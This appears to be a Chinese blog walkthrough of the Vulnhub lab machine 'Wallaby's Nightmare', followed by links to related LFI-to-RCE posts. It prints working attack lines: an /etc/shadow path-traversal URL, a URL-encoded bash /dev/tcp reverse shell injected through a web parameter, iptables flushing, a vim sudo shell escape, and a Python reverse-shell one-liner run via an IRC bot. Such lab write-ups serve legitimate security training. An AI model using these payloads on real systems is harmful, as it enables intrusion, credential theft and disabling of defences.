[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE

最新推荐文章于 2024-07-09 18:25:02 发布
最新推荐文章于 2024-07-09 18:25:02 发布
阅读量344 收藏 9
点赞数 5
分类专栏: Vulnhub 文章标签: chrome 前端
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140024814
版权

信息收集

Server IP AddressOpening Ports
192.168.8.105TCP:22,80,6667,60080

$ nmap -p- -sC -sV 192.168.8.105 --min-rate 1000 -Pn

image.png

基础Shell

image-1.png

http://192.168.8.105/?page=../../../../../etc/shadow

image-2.png

当再次尝试访问已经关闭

image-3.png

$ nmap -p- -sC -sV 192.168.8.105 --min-rate 1000 -Pn

开放端口60080

image-4.png

image-5.png

$ arjun -u http://192.168.8.105:60080

image-6.png

还是之前的page参数

$ dirb "http://192.168.8.105:60080/?page="

image-7.png

http://192.168.8.105:60080/?page=mailer

image-8.png

$ dirb "http://192.168.8.105:60080/?page=mailer&mail="

再次通过爆破,发现参数dir有变化

image-9.png

image-10.png

反弹shell

http://192.168.8.105:60080/?page=mailer&mail=%2fbin%2fbash+-c+%27bash+-i+%3E%26+%2fdev%2ftcp%2f192.168.8.107%2f10032+0%3E%261%27

image-11.png

Local.txt 截屏

image-16.png

Local.txt 内容

96e9dd72f028f2b2c894852ee056eb91

权限提升

清除防火墙规则

image-12.png

查看 IP 表规则

这里有两种方法
1.利用chisel端口转发绕过防火墙策略
2.直接关闭防火墙过滤规则

$ sudo /sbin/iptables -L

image-13.png

$ sudo /sbin/iptables --flush

重置规则

image-14.png

image-29.png

IRC 聊天&假冒用户waldo提升至Wallaby用户

使用irssi连接聊天服务

Irssi 是一个文本模式的 IRC(Internet Relay Chat)客户端程序,主要设计用来在命令行界面下进行 IRC 聊天。它是一个开源软件,支持多平台(如 Linux、Unix、Windows 等),并且提供了丰富的插件和脚本支持,使用户可以根据自己的需求进行定制和扩展。Irssi 主要用于在终端或者通过 SSH 连接的方式进行 IRC 聊天,适合那些喜欢命令行界面或者需要在服务器上进行 IRC 聊天的用户。

$ irssi -c 192.168.8.105

/list

列出聊天列表

image-17.png

/join #wallabyschat

加入频道

image-18.png

.run,要求我们必须是waldo

image-19.png

使用vim将身份切换到waldo

$ sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
:!bash

image-15.png

提升稳定的终端

image-20.png

有一个tmux会话连接到irc服务器

手动结束进程,冒充waldo进入聊天室

$ ps aux | grep tmux

image-21.png

$ pkill -9 tmux

终止所有关于tmux的进程

image-22.png

/nick waldo

替换昵称

image-23.png

.run python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.107",10033));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

image-24.png

image-25.png

同样ssh免密登录
image-27.png

Proof.txt 截屏

image-28.png

Proof.txt 内容

d41d8cd98f00b204e9800998ecf8427e

Мартин.
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LFI 临时文件RCE总结
qq_43576303的博客
07-26 979
LFI 临时文件RCE总结 ​ PHP LFI即本地文件包含漏洞,通过包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文件等达到拿服务器权限的目的。 ​ 比较常用的方法有:PHPINFO()和 PHP7 Segment Fault。他们的基本原理都是向服务器上传生成恶意的临时文件,再对恶意文件进行包含即可RCE。 临时文件 文件名 由于临时文件名是由随机函数生成的,我们需要获取正确的文件名,也就是$_FILES['userfile']['name']。 存储目录及命名规律 文件被上传后
LFISploit:利用lfi +反向外壳+扫描器
04-01
**LFISploit:利用LFI、反向外壳与扫描器** LFISploit是一个针对本地文件包含(Local File Inclusion, LFI)漏洞的自动化工具,它允许黑客通过多种攻击策略来探测和利用系统中的漏洞。这个工具设计用于Windows、...
[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+Lxc逃逸
06-15 803
#SMTP未授权 #文件包含 #SUID-Screen权限提升 #内网横向 #Tomcat #Struts-v2 #lxc逃逸
LFI TO RCE之pearcmd.php的妙用
Aiwin的博客
10-10 2393
LFI TO RCE之pearcmd.php的妙用及NewStarCTF IncludeTwo例题
【甄选靶场】Vulnhub百个项目渗透——项目三十四:wallabysnightmare1.0.2(LFI,irc提权)
人间体佐菲的博客
10-07 677
【甄选靶场】Vulnhub百个项目渗透——项目三十四:wallabysnightmare1.0.2(LFI,irc提权)
[PHP]无需可控文件的LFI-RCE学习
feng的博客
01-05 2344
[PHP]无需可控文件的LFI-RCE学习 前言 昨天晚上P神的代码审计圈子里面提到了一个LFI的方法,题目来源是前段时间的HXPCTF中的题目includer's revenge。国外的一个师傅通过fuzz的方法通过iconv成功的将任意一个文件里的内容转换为一句话木马的方式,基本上可以说,PHP的LFI可能就到此为止了。 今天参考陆队的文章:https://tttang.com/archive/1395/,来学习一下思路和攻击方式。确实不得不说,nb。 这篇文章就只是大概记录一下学习的思路了,水一点因为
无需可控文件的LFI-RCE
qq_53263789的博客
02-09 452
前言 在 PHP 中,我们可以利用 PHP Base64 Filter 宽松的解析,通过 iconv filter 等编码组合构造出特定的 PHP 代码进而完成无需临时文件的 RCE 。 利用 <?=`$_GET[0]`;;?> PD89YCRfR0VUWzBdYDs7Pz4= <?php $base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"; $conversions = array( 'R' => 'convert.iconv.UTF8
利用php代码实现,利用PHP代码实现LFI2RCE
weixin_39963819的博客
03-25 155
之前曾写过一篇博文《LFI2RCE思路》:http://riusksk.blogbus.com/logs/34781127.html,本文主要是利用PHP代码来实现LFI2RCE,主要是看了《hack in zine》杂志之后学到的,这里顺便记录一下,但所使用的方法依然是上一博文中eb649e3928XkBK0p所提到的,即利用服务器上的相关记录文件来实现LFI2RCE。在HIZ杂志中所用到的函数...
从文件包含到RCE方法
12-10 1083
大家在参加众测的行动时,若是发现了以下基础危害不大的漏洞,不建议直接提交的,而是应该想办法看,能不能对该漏洞进行升级,扩大其危害,多拿点奖励。当然,文件包含不算常见,经常出现在php程序中远程文件包含(RFI)通过上传上传任意格式后缀包含shell代码的文件,然后包含该文件即可。通过apache日志中间件的日志是及其容易受到文件包含攻击的,例如:可以通过在GET URL时,在参数中填写,这样,恶意内容就会被包含到web日志中,在通过包含该日志,即可成功的进行代码执行。常见中间件日志位置。
php Wrapper LFI,利用PHP代码实现LFI2RCE
weixin_34213766的博客
03-16 174
在HIZ杂志中所用到的函数是passthru(http://cn2.php.net/passthru),主要还是为了实现一句话木马,当然也可使用exec 以及system等函数,三者之间的区别可参考《PHP 执行系统外部命令 system() exec() passthru()》:http://hi.baidu.com/cgeek/blog/item/fb9a1e4cd1bf1afdd62afc7...
finc:扫描利用lfi漏洞
04-03
芬奇利用python3编写的LFI的开发设置: git clone https://github.com/DSimsek000/finccd finc# recommended setup with virtualenvpython -m venv envsource env/bin/activatepip install -r requirements.txt句法...
用golang制作的模糊器,用于查找xss,lfirce,ssti等问题,该问题可通过更改内容长度来检测问题,并使用签名进行验证-Golang开发
05-26
用golang制作的模糊器,用于查找xss,lfirce,ssti等问题,该问题可通过更改内容长度来检测问题,并使用签名进行验证。 什么是BountyIt? 用golang制作的模糊器,用于查找xss,lfirce,ssti等问题,该问题可通过...
磊科 205+ 2.4.42 升级包
09-14
此升级包的核心目的是为了提升设备的性能、稳定性以及安全性,确保用户能够享受到更流畅的网络服务。下面将详细阐述升级包的主要内容及其重要性。 磊科205+是一款流行的家用路由器,它提供了基础的网络连接功能,如...
Vailyn:Python中的分阶段规避路径遍历+ LFI扫描和利用工具
04-14
使用--lfi将它们包括在扫描中。关于Vailyn是用于路径遍历/目录爬网漏洞的多阶段漏洞分析和利用工具。 它的建立是为了使其性能尽可能好,并提供广泛的过滤器规避技术。它是如何工作的? Vailyn分两个阶段运行。 首先...
晚上定时编译android系统
DaSunWarman的博客
07-08 421
难点就是at这个命令默认使用的是/bin/sh。也不能设置成/bin/bash(我找不到办法设置成/bin/bash,有大佬知道吗?编译android需要/bin/bash ,虽然sh软连接到bash,但是照样不行。可能偶然想晚上定时编译android系统。需要,用bash来启动编译。所以,不能直接在脚本写。
【Linux】shell基础&知识点(updating)
最新发布
atwdy的博客
07-09 1072
从输出结果也可以看到:管道操作并非后面的进程在前面的进程执行完后启动,而是同时启动,只有当前面进程的标准输出是后面进程的标准输入时,前面进程才会一定先于后面进程执行完。1)bash与sh的区别:可以简单理解为,bash在sh的基础上,增加了更多的拓展特性,适合编写更复杂的脚本,兼容sh。bash、sh、以及相对路径或绝对路径的方式执行,相当于在当前进程中新开了一个子进程用来执行脚本,脚本执行完子进程销毁,子进程中定义的变量&环境不会回传给父进程。≠0)时,后面命令才会执行。=0)时,后面的命令才会执行。
一个用于在虚拟桌面下跑chrome的docker镜像
Socrates的技术笔记
07-09 460
制作了一个用于跑chrome的docker镜像,主要是为了支持能够通过xvfb或者wayland,给chrome提供一个虚拟的桌面环境。这个容器可以通过如下方式获取(tag即为chrome的版本号)
web自动化环境搭建[基于Chrome]+常用元素定位方式
u013080870的博客
07-08 885
web自动化,以及初中级面试题
CTF LFI to RCE
10-20
CTF LFI to RCE是一种常见的网络安全攻击技术,其中LFI代表本地文件包含,RCE代表远程代码执行。攻击者利用LFI漏洞,通过包含恶意代码来实现对目标服务器的攻击,进而实CTF LFI to RCE是一种常见的网络安全攻击技术,其中LFI代表本地文件包含,RCE代表远程代码执行。攻击者利用LFI漏洞,通过包含恶意代码来实现对目标服务器的攻击,进而实现RCE。这种攻击技术在CTF比赛中也经常被使用,作为一种常见的攻击手段。在CTF比赛中,参赛者需要利用给定的漏洞,尝试获取目标服务器的权限,以此来获得比赛的胜利。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值